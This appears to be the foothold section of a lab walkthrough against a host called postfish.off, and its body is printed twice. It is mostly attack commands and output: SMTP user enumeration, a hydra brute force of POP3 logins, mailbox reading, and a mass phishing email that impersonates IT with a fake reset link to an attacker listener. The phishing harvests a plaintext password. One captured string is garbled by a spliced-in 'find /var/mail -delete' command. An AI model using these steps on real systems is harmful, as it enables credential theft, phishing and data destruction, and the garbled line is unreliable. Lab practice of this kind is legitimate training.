Foothold

Previous80 NextPriv Esc

Last updated 5 months ago

Foothold

First.Last

FLast

FirstL

Claire.Madison

Cmadison

ClaireM

Mike.Ross

Mross

MikeR

Brian.Moore

Bmoore

Brianmoore

Sarah.Lorem

SLorem

SarahL

$ nmap -p25 --script=smtp* postfish.off                                  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-10 07:57 CDT
Nmap scan report for postfish.off (192.168.185.137)
Host is up (0.039s latency).

PORT   STATE SERVICE
25/tcp open  smtp
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE
|_smtp-commands: postfish.off, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
|_smtp-open-relay: Server doesn't seem to be an open relay, all tests failed
| smtp-enum-users: 
|_  root

Nmap done: 1 IP address (1 host up) scanned in 20.53 seconds

$ smtp-user-enum -U users.lower -t postfish.off
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... users.lower
Target count ............. 1
Username count ........... 8
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ 

######## Scan started at Wed Sep 11 06:18:51 2024 #########
postfish.off: brian.moore exists
postfish.off: hr exists
postfish.off: sales exists
postfish.off: legal exists
postfish.off: mike.ross exists
postfish.off: sarah.lorem exists
postfish.off: it exists
postfish.off: claire.madison exists
######## Scan completed at Wed Sep 11 06:18:53 2024 #########
8 results.

8 queries in 2 seconds (4.0 queries / sec)

Found some valid usernames

claire.madison
mike.ross
brian.moore
sarah.lorem
it
hr
sales
legal

$ hydra -L users.lower -P users.lower postfish.off pop3 -vV -I -t 10

sales:sales

$ telnet postfish.off 110
Trying 192.168.211.137...
Connected to postfish.off.
Escape character is '^]'.
+OK Dovecot (Ubuntu) ready.
user sales
+OK
pass sales
+OK Logged in.
list
+OK 1 messages:
1 683
.
retr 1
+OK 683 octets

claire.madison@postfish.off
mike.ross@postfish.off
brian.moore@postfish.off
sarah.lorem@postfish.off
it@postfish.off
hr@postfish.off
sales@postfish.off
legal@postfish.off

$ nc -lnvp 80

$ for i in $(cat emails.txt); do swaks --to $i@postfish.off --from it@postfish.off --header 'Subject: Password Reset Link' --body 'Reset your password and get pwned here http://192.168.45.168' --server 192.168.211.137; done

first_name%3DBrian%26last_name%3DMoore%26email%3Dbrian.moore%postfish.off%26username%3Dbrian.moore%26password%3DEternaLSunshinE%26confifind /var/mail/ -type f ! -name sales -delete_password%3DEternaLSunshinE

brian.moore:EternaLSunshinE

Previous80 NextPriv Esc

Last updated 5 months ago

First.Last

FLast

FirstL

Claire.Madison

Cmadison

ClaireM

Mike.Ross

Mross

MikeR

Brian.Moore

Bmoore

Brianmoore

Sarah.Lorem

SLorem

SarahL

$ nmap -p25 --script=smtp* postfish.off                                  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-10 07:57 CDT
Nmap scan report for postfish.off (192.168.185.137)
Host is up (0.039s latency).

PORT   STATE SERVICE
25/tcp open  smtp
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE
|_smtp-commands: postfish.off, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
|_smtp-open-relay: Server doesn't seem to be an open relay, all tests failed
| smtp-enum-users: 
|_  root

Nmap done: 1 IP address (1 host up) scanned in 20.53 seconds

$ smtp-user-enum -U users.lower -t postfish.off
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... users.lower
Target count ............. 1
Username count ........... 8
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ 

######## Scan started at Wed Sep 11 06:18:51 2024 #########
postfish.off: brian.moore exists
postfish.off: hr exists
postfish.off: sales exists
postfish.off: legal exists
postfish.off: mike.ross exists
postfish.off: sarah.lorem exists
postfish.off: it exists
postfish.off: claire.madison exists
######## Scan completed at Wed Sep 11 06:18:53 2024 #########
8 results.

8 queries in 2 seconds (4.0 queries / sec)

Found some valid usernames

claire.madison
mike.ross
brian.moore
sarah.lorem
it
hr
sales
legal

$ hydra -L users.lower -P users.lower postfish.off pop3 -vV -I -t 10

sales:sales

$ telnet postfish.off 110
Trying 192.168.211.137...
Connected to postfish.off.
Escape character is '^]'.
+OK Dovecot (Ubuntu) ready.
user sales
+OK
pass sales
+OK Logged in.
list
+OK 1 messages:
1 683
.
retr 1
+OK 683 octets

claire.madison@postfish.off
mike.ross@postfish.off
brian.moore@postfish.off
sarah.lorem@postfish.off
it@postfish.off
hr@postfish.off
sales@postfish.off
legal@postfish.off

$ nc -lnvp 80

$ for i in $(cat emails.txt); do swaks --to $i@postfish.off --from it@postfish.off --header 'Subject: Password Reset Link' --body 'Reset your password and get pwned here http://192.168.45.168' --server 192.168.211.137; done

brian.moore:EternaLSunshinE